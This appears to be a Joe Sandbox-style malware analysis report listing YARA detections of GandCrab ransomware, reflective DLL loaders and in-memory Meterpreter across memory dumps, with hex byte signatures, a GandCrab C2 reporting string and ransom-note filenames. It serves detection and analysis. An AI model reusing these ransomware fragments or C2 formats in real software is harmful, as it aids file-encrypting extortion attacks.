00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000021.00000000.547433699.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000000.449352573.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000012.00000000.383675616.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000016.00000000.422070871.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000021.00000002.567428078.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000001B.00000002.470832696.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000028.00000002.601264865.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001E.00000000.505234483.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000016.00000002.444710871.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000C.00000000.321133700.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000001F.00000002.547067316.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000012.00000002.407240939.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000001C.00000002.511336369.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000027.00000000.580667243.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001E.00000002.508822992.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000D.00000000.343145557.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mPNVrHIpyt.exe PID: 3592	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mPNVrHIpyt.exe PID: 3592	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 1276	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0xe897:$xs1: WS2_32.dll 0xc92:$xs2: ReflectiveLoader 0xcb4:$xs2: ReflectiveLoader 0x4e61:$xs2: ReflectiveLoader 0x4e83:$xs2: ReflectiveLoader 0x11939:$xs2: ReflectiveLoader 0x1195b:$xs2: ReflectiveLoader
Process Memory Space: wzltxa.exe PID: 1276	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 1276	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 1920	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 1920	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 4616	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x1365b:$xs1: WS2_32.dll 0x14b2c:$xs1: WS2_32.dll 0x55ac:$xs2: ReflectiveLoader 0x55ce:$xs2: ReflectiveLoader 0xc019:$xs2: ReflectiveLoader 0xc03b:$xs2: ReflectiveLoader 0x12855:$xs2: ReflectiveLoader 0x12877:$xs2: ReflectiveLoader
Process Memory Space: wzltxa.exe PID: 4616	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 4616	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 6136	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x12777:$xs1: WS2_32.dll 0x1b4d:$xs2: ReflectiveLoader 0x1b6f:$xs2: ReflectiveLoader 0x3bdd:$xs2: ReflectiveLoader 0x3bff:$xs2: ReflectiveLoader 0xb50b:$xs2: ReflectiveLoader 0xb52d:$xs2: ReflectiveLoader
Process Memory Space: wzltxa.exe PID: 6136	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 6136	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 1356	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x7d28:$xs1: WS2_32.dll 0xad31:$xs2: ReflectiveLoader 0xad53:$xs2: ReflectiveLoader 0xcb36:$xs2: ReflectiveLoader 0xcb58:$xs2: ReflectiveLoader 0x1546c:$xs2: ReflectiveLoader 0x1548e:$xs2: ReflectiveLoader
Process Memory Space: wzltxa.exe PID: 1356	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 1356	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 2996	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 6016	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x3028:$xs1: WS2_32.dll 0x4940:$xs1: WS2_32.dll 0x92af:$xs2: ReflectiveLoader 0x92d1:$xs2: ReflectiveLoader 0xb24a:$xs2: ReflectiveLoader 0xb26c:$xs2: ReflectiveLoader 0xfdd5:$xs2: ReflectiveLoader 0xfdf7:$xs2: ReflectiveLoader
Process Memory Space: wzltxa.exe PID: 6016	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 6016	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 5520	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 5520	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 2228	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 6128	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0xb8ee:$xs1: WS2_32.dll 0x30dc:$xs2: ReflectiveLoader 0x30fe:$xs2: ReflectiveLoader 0x6643:$xs2: ReflectiveLoader 0x6665:$xs2: ReflectiveLoader 0x15527:$xs2: ReflectiveLoader 0x15549:$xs2: ReflectiveLoader
Process Memory Space: wzltxa.exe PID: 6128	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 6128	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 5752	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 2156	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x10a25:$xs1: WS2_32.dll 0xf4d:$xs2: ReflectiveLoader 0xf6f:$xs2: ReflectiveLoader 0x4c72:$xs2: ReflectiveLoader 0x4c94:$xs2: ReflectiveLoader 0xc7e7:$xs2: ReflectiveLoader 0xc809:$xs2: ReflectiveLoader
Process Memory Space: wzltxa.exe PID: 2156	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 2156	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 5248	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x1d29:$xs1: WS2_32.dll 0x8f05:$xs2: ReflectiveLoader 0x8f27:$xs2: ReflectiveLoader 0xcb39:$xs2: ReflectiveLoader 0xcb5b:$xs2: ReflectiveLoader 0xf84e:$xs2: ReflectiveLoader 0xf870:$xs2: ReflectiveLoader
Process Memory Space: wzltxa.exe PID: 5248	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wzltxa.exe PID: 5248	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wzltxa.exe PID: 4920	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
